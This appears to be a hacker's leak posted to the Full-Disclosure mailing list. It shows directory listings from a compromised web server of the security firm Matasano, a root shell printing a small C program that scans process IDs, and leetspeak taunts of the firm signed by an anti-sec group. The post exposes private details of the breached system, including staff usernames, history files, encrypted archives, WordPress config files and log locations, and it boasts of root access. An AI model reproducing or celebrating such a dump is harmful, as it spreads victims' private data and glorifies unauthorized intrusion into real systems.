-rw-r----- 1 root adm 1890 Mar 24 2007 debug.0.gz
-rw-r--r-- 1 root adm 6285 Apr 1 2007 dmesg.0.gz
-rw-r--r-- 1 root adm 6283 Apr 1 2007 dmesg.1.gz
-rw-r----- 1 root adm 19843 Mar 24 2007 kern.log.0.gz
-rw-r----- 1 root adm 91 Mar 23 2007 lpr.log.0.gz
-rw-r----- 1 root adm 111 Mar 24 2007 mail.err.0.gz
-rw-r--r-- 1 root root 55685529 Mar 28 2008 mail.log.0.gz
-rw-r----- 1 root adm 112 Mar 24 2007 mail.warn.0.gz
-rw-r----- 1 root adm 10219 Mar 25 2007 messages.0.gz
-rw-r----- 1 mysql adm 20 Mar 30 2007 mysql.log.1.gz
-rw-r----- 1 mysql adm 20 Mar 25 2007 mysql.log.6.gz
-rw-r----- 1 mysql adm 20 Mar 24 2007 mysql.log.7.gz
-rw-r----- 1 root adm 101030 Mar 31 2007 syslog.0.gz
-rw-r----- 1 root adm 104128 Mar 30 2007 syslog.1.gz
-rw-r----- 1 root adm 1598 Mar 25 2007 syslog.6.gz
-rw-r----- 1 root adm 176 Mar 23 2007 user.log.0.gz
/home/logs:
total 4424896
drwxr-sr-x 2 root staff 4096 May 20 2008 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw-r--r-- 1 root staff 907628746 Jul 25 04:17 auth.log
-rw-r--r-- 1 root staff 3616228772 Jul 25 04:19 mail.log
-rw-r--r-- 1 root root 2561119 Jan 25 2008 mail.log.3
-rw-r--r-- 1 root root 214313 Dec 10 2007 mail.log.5
/home/lost+found:
total 52
drwxr-xr-x 2 root root 49152 Mar 22 2007 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
/home/masano:
total 16
drwxr-xr-x 2 masano masano 4096 Mar 23 2007 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw-r--r-- 1 max masano 567 Mar 23 2007 .bash_profile
-rw-r--r-- 1 max masano 1834 Mar 23 2007 .bashrc
/home/max:
total 40
drwxr-xr-x 4 max max 4096 Jun 17 18:05 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw------- 1 max max 198 Jul 9 19:43 .bash_history
-rw-r--r-- 1 max max 220 Aug 4 2007 .bash_logout
-rw-r--r-- 1 max max 414 Aug 4 2007 .bash_profile
-rw-r--r-- 1 max max 2254 Aug 20 2007 .bashrc
-rw------- 1 max max 71 Jul 8 12:34 .lesshst
-rw-r--r-- 1 root root 25 Sep 18 2007 .qmail
drwxr-xr-x 2 max root 4096 Mar 4 2008 .ssh
drwxr-xr-x 3 max max 4096 Aug 4 2007 .subversion
/home/mtracy:
total 59988
drwxr-xr-x 5 mtracy mtracy 4096 Feb 17 11:40 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw------- 1 mtracy mtracy 3463 May 6 08:43 .bash_history
-rw-r--r-- 1 mtracy mtracy 220 Aug 5 2007 .bash_logout
-rw-r--r-- 1 mtracy mtracy 414 Aug 5 2007 .bash_profile
-rw-r--r-- 1 mtracy mtracy 2227 Aug 5 2007 .bashrc
-rw------- 1 mtracy mtracy 35 Feb 10 12:42 .lesshst
-rw------- 1 mtracy mtracy 44 Oct 25 2007 .mysql_history.TMP
-rw-r--r-- 1 mtracy mtracy 22 Aug 5 2007 .qmail
drwxr-xr-x 2 mtracy root 4096 Oct 9 2007 .ssh
drwxr-xr-x 3 mtracy mtracy 4096 Oct 9 2007 .subversion
-rw-r--r-- 1 eptacek eptacek 60694939 Nov 4 2008 LN.tgz.asc
drwx------ 2 mtracy mtracy 4096 Feb 17 11:40 Mail
-rw------- 1 mtracy mtracy 0 Aug 5 2007 Mailbox
-rwxr-xr-x 1 mtracy mtracy 63 Feb 6 15:21 m.sh
-rw-r--r-- 1 mtracy mtracy 605859 Jan 9 2009 tqbf-moe.tgz.gpg
/home/mysql-OLD:
total 20584
drwxr-xr-x 7 mysql mysql 4096 Aug 19 2007 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw-r--r-- 1 root root 0 Mar 24 2007 debian-5.0.flag
-rw-rw---- 1 mysql mysql 25088 Mar 24 2007 ib_arch_log_0000000000
-rw-rw---- 1 mysql mysql 5242880 Aug 19 2007 ib_logfile0
-rw-rw---- 1 mysql mysql 5242880 Mar 24 2007 ib_logfile1
-rw-rw---- 1 mysql mysql 10485760 Aug 19 2007 ibdata1
drwxr-xr-x 2 mysql mysql 4096 Apr 1 2007 mysql
-rw------- 1 root root 6 Mar 24 2007 mysql_upgrade_info
drwxr-xr-x 2 mysql mysql 4096 Mar 24 2007 test
drwx------ 2 mysql mysql 4096 Mar 24 2007 test1
drwx------ 2 mysql mysql 4096 Mar 25 2007 test_database
drwx------ 2 mysql mysql 4096 Mar 24 2007 wordpress
-rw-rw---- 1 mysql root 449 Mar 26 2007 www.err
/home/nagbot:
total 32
drwxr-xr-x 4 nagbot nagbot 4096 Jun 9 2008 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw-r--r-- 1 nagbot nagbot 220 Jun 9 2008 .bash_logout
-rw-r--r-- 1 nagbot nagbot 414 Jun 9 2008 .bash_profile
-rw-r--r-- 1 nagbot nagbot 2227 Jun 9 2008 .bashrc
-rw-r--r-- 1 nagbot nagbot 22 Jun 9 2008 .qmail
drwxr-xr-x 2 nagbot nagbot 4096 Jun 9 2008 Mail
-rw-r--r-- 1 nagbot nagbot 0 Jun 9 2008 Mailbox
drwxr-xr-x 2 nagbot nagbot 4096 Jun 9 2008 Maildir
-rw-r--r-- 1 nagbot nagbot 0 Jun 9 2008 mbox
/home/oldlogs:
total 1878728
drwxr-sr-x 2 root staff 4096 May 20 2008 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw-r--r-- 1 root staff 11274240 May 20 2008 05202008.tar
-rw-r--r-- 1 root root 734 Mar 23 2007 aptitude.1.gz
-rw-r--r-- 1 root root 37460038 Mar 9 2008 auth-382008.log
-rw-r--r-- 1 root staff 62255480 Oct 7 2007 auth.10062007.log
-rw-r--r-- 1 root root 1773755 Feb 14 2008 auth.log.1.gz
-rw-r----- 1 root adm 18753 Jun 3 2007 dpkg.log.1.gz
-rw-r--r-- 1 root staff 878178250 May 20 2008 mail-05202008.log
-rw-r--r-- 1 root staff 129249172 May 20 2008 mail-05202008.log.1.gz
-rw-r--r-- 1 root root 201716 Oct 7 2007 mail-unknown.log
-rw-r--r-- 1 root staff 325920825 Oct 7 2007 mail.10062007.log
-rw-r--r-- 1 root staff 417771817 Mar 9 2008 mail.log
-rw-r--r-- 1 root staff 56672256 May 20 2008 mail.log.1.gz
-rw-r----- 1 root adm 1063029 May 20 2008 messages-05202008
-rw-r----- 1 mysql adm 20 Oct 7 2007 mysql.log.1.gz
-rw-r----- 1 mysql adm 20 Mar 31 2007 mysql.log.2.gz
-rw-rw-r-- 1 root utmp 3418 Jan 25 2008 wtmp.1.gz
/home/postgresql:
total 12
drwxr-xr-x 3 postgres postgres 4096 Jun 18 2008 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
drwxr-xr-x 3 postgres postgres 4096 Jun 18 2008 8.3
/home/root:
total 5208
drwxr-sr-x 2 root staff 4096 Jul 11 2007 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rwxrwxrwx 1 root staff 5310486 Jun 24 07:23 Mailbox
/home/rsftp:
total 32
drwxr-sr-x 7 root staff 4096 May 19 2008 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
drwxr-sr-x 2 root staff 4096 May 20 2008 dev
drwxr-sr-x 2 root staff 4096 May 19 2008 etc
drwxr-sr-x 3 root staff 4096 May 19 2008 home
drwxr-sr-x 3 root staff 4096 May 19 2008 lib
-rw-r--r-- 1 root staff 3 May 19 2008 log
drwxr-sr-x 6 root staff 4096 May 19 2008 usr
/home/stephen:
total 24164
drwxr-sr-x 4 stephen staff 4096 Feb 18 17:53 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw------- 1 stephen staff 432 Jun 10 08:49 .bash_history
-rw-r--r-- 1 stephen staff 18 Aug 6 2008 .qmail
drwxr-sr-x 2 stephen staff 4096 Aug 6 2008 .ssh
-rw-rw-rw- 1 stephen staff 21632318 Feb 13 12:57 BinNavi-stephenlawler_bitsanddata_com-8333881a256cf19f9c6fd79f21f70141.zip
-rw-r--r-- 1 stephen eptacek 2908208 Sep 15 2008 burpsuite_v1.1_pro.zip
drwxr-sr-x 2 stephen staff 4096 Feb 18 17:54 public_html
-rw-r--r-- 1 stephen staff 135001 Oct 10 2008 serial_snoop.tar.gz
/home/tbreviewed:
total 12
drwxr-sr-x 3 root staff 4096 Jan 9 2009 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
drwxrwsr-x 35 root staff 4096 Dec 21 2008 src
/home/td:
total 36
drwxr-xr-x 3 td td 4096 Aug 8 2008 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw------- 1 td td 3125 Jul 13 18:56 .bash_history
-rw-r--r-- 1 td td 220 May 21 2008 .bash_logout
-rw-r--r-- 1 td td 414 May 21 2008 .bash_profile
-rw-r--r-- 1 td td 2227 May 21 2008 .bashrc
-rw------- 1 td td 53 Jul 13 11:12 .lesshst
-rw-r--r-- 1 td root 19 Sep 30 2008 .qmail
drwxr-xr-x 2 td root 4096 May 6 11:57 .ssh
/home/tmp:
total 4813860
drwxrwxrwt 2 root staff 4096 Jun 15 13:15 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw-r--r-- 1 eptacek eptacek 4916979805 Jun 2 05:19 bunny.tgz
-rwxrwxrwx 1 eptacek eptacek 3587319 Apr 13 16:39 burpsuite_pro_v1.2.05.jar
-rw-r--r-- 1 eptacek eptacek 3624639 Jun 15 13:16 burpsuite_pro_v1.2.11.jar
-rw-r--r-- 1 eptacek eptacek 28740 Jun 1 15:39 new-2.png
-rw-r--r-- 1 eptacek eptacek 20009 Jun 1 15:39 new-3.png
-rw-r--r-- 1 eptacek eptacek 20605 Jun 1 15:39 new-lessspiky.png
-rw-r--r-- 1 eptacek eptacek 36483 Jun 1 15:39 new.png
-rw-r--r-- 1 eptacek eptacek 244927 Jun 1 17:02 whatsnew-lightgreen.ai
/home/tqbf:
total 834544
drwxr-xr-x 12 tqbf tqbf 4096 Jul 13 15:30 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw-r--r-- 1 tqbf tqbf 4096 Dec 6 2007 ._svn-camp.rb
-rw------- 1 tqbf tqbf 94 Feb 6 13:34 .bash_history
-rw-r--r-- 1 tqbf tqbf 567 Mar 23 2007 .bash_profile
-rw-r--r-- 1 tqbf tqbf 1834 Mar 23 2007 .bashrc
drwxr-xr-x 2 tqbf tqbf 4096 Mar 30 2007 .gem
drwx------ 2 tqbf tqbf 4096 Aug 8 2008 .gnupg
-rw-r--r-- 1 tqbf tqbf 0 Mar 28 2007 .initialized
-rw------- 1 tqbf tqbf 76 Jul 7 18:16 .lesshst
-rw------- 1 tqbf tqbf 127 Mar 20 14:24 .mysql_history
-rw------- 1 root root 0 May 30 21:30 .mysql_history.TMP
-rw------- 1 tqbf tqbf 648 Jul 22 13:56 .nano_history
-rw-r--r-- 1 tqbf tqbf 24 Mar 26 2007 .qmail
-rw-r--r-- 1 tqbf tqbf 20 Dec 9 2008 .qmail-breakpoint-thomas
-rw-r--r-- 1 tqbf tqbf 20 Dec 9 2008 .qmail-breakpoint-thp
-rw-r--r-- 1 tqbf tqbf 20 Dec 9 2008 .qmail-breakpoint-tom
-rw-r--r-- 1 tqbf tqbf 20 Dec 9 2008 .qmail-breakpoint-tqbf
-rw------- 1 root root 1024 Oct 6 2007 .rnd
-rw------- 1 tqbf tqbf 0 May 21 2008 .sqlite_history
drwxr-xr-x 2 tqbf tqbf 4096 Mar 29 2007 .ssh
drwxr-xr-x 3 root root 4096 Mar 26 2007 .subversion
-rwxr-xr-x 1 tqbf tqbf 9792 May 24 2008 .tcshrc
-rw-r--r-- 1 tqbf tqbf 21536 Sep 19 2008 45fa30d9b5a8b376.wsdl
-rw-r--r-- 1 root root 580187210 Aug 8 2008 68e2ac2098.tgz.gpg
drwx------ 2 root root 4096 Feb 6 01:49 Mail
lrwxrwxrwx 1 tqbf tqbf 18 May 21 2008 apache -> /usr/local/apache2
-rw-r--r-- 1 root root 9013245 Sep 13 2008 bak.tgz
drwxr-xr-x 15 tqbf tqbf 4096 Dec 11 2007 beast
drwxr-xr-x 6 tqbf tqbf 4096 Aug 8 2008 clean
-rw-r--r-- 1 tqbf tqbf 29316 Mar 4 10:52 data
-rw-r--r-- 1 root root 516 Feb 6 13:32 dropsh.c
-rw-r--r-- 1 tqbf tqbf 290 Aug 10 2008 includes
-rw-r--r-- 1 tqbf tqbf 1514600 Sep 13 2008 latest.zip
drwxr-xr-x 6 tqbf tqbf 4096 Aug 8 2008 log-backups
drwxr-xr-x 2 tqbf tqbf 4096 Jul 11 2008 matasano
-rw-r--r-- 1 tqbf tqbf 262788869 Sep 25 2008 ptacek mcfeters tracy-1.mov
-rwxr-xr-x 1 tqbf tqbf 7620 Aug 10 2008 t
-rw-r--r-- 1 tqbf tqbf 470 Aug 10 2008 t.c
lrwxrwxrwx 1 tqbf tqbf 58 Jul 16 2008 theme -> /usr/local/apache2/matasano/log/wp-content/themes/matasano
drwxr-xr-x 3 tqbf tqbf 4096 Sep 13 2008 tmp
-rwxr-xr-x 1 tqbf tqbf 1224 Jul 13 16:24 to-basecamp.rb
---------- 1 root root 898 Aug 11 2008 wp-config.php.ro
---------- 1 root root 902 Aug 11 2008 wp-config.php.rw
/home/wbrown:
total 48
drwxr-sr-x 5 wbrown staff 4096 Aug 8 2008 .
drwxrwsr-x 36 root staff 4096 Jan 9 2009 ..
-rw------- 1 wbrown staff 5504 Feb 18 18:31 .bash_history
-rw------- 1 wbrown staff 53 Feb 27 2008 .lesshst
-rw-r--r-- 1 wbrown staff 34 Jul 13 15:20 .qmail
lrwxrwxrwx 1 root staff 6 Feb 10 2008 .qmail-default -> .qmail
drwxr-sr-x 2 wbrown staff 4096 Mar 27 13:10 .ssh
drwx--S--- 2 wbrown staff 4096 Feb 10 2008 Mail
drwx--S--- 5 wbrown staff 4096 Apr 1 2008 Maildir
-rw------- 1 wbrown staff 10886 Feb 21 2008 sent
root@www:~# cat /home/tqbf/t.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <time.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <errno.h>
#include <assert.h>
int
main(int argc, char **argv) {
int i = 0;
for(i = 0; i < 65535; i++) {
int e = kill(i, 0);
if(e != -1 || errno != ESRCH) {
printf("%d\n", i);
}
}
exit(0);
}
## sh1tttttt, th31r 4nt1-r00tk1t t3kn33qz 4r3 t00 g00d! 1tz 4 tr4p!!! l3z g3t 0utt4 h3r3~~~ ##
* Experts in information security and vulnerability analysis, extensively quoted and cited throughout industry and academia, offering over 50 combined years experience.
- l0l0l0l0lz0z
* Founders of ISS X-Force and Secure Networks, Inc., the industry's first vulnerability labs.
- h4 h4 h4 h4
* Authors of numerous published vulnerabilities in shipping commercial products ranging from embedded routers to operating systems to applications.
- O HEY M4T4S4N0 H3RE UR #1 STOP FOR KOMPUTER SEKURY = LULZ!!
* Expert black-box testers; authors of most widely-cited paper in network security product testing.
- BLACK-BOX MADN#ZZZZ RULZLZULZ ROOT ROOT
* Trusted advisors to and proven leaders at organizations such as Microsoft, Arbor Networks, @stake, SecurityFocus, and Internet Security Systems.
- h4h4h4h44h
* Veteran software developers; lead roles on shipping products on teams with tens of engineers. Code written by Matasano team members runs in the backbone of every tier 1 ISP worldwide.
- WHAT AWHT L0L L0L
* Major training engagements within the Fortune 100, trained thousands of engineers, multiple book authorship credits.
- A WHITEHAT FUQTORY, h4 4h 4h h4 h4h!!!
th1s m3ss4g3 br0ught t0 u by th3 just1f13d 4nc1ents 0f 0r0b0r0z
pr0ud supp0rt3rz 0f pr0j3kt m4yh3m & the Anti-sec Movement
The 0r0b0r0z often represents self-reflexivity or cyclicality, especially in the sense of something constantly re-creating itself, the eternal return, and other things perceived as cycles that begin anew as soon as they end. It can also represent the idea of primordial unity related to something existing in or persisting from the beginning with such force or qualities it cannot be extinguished.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists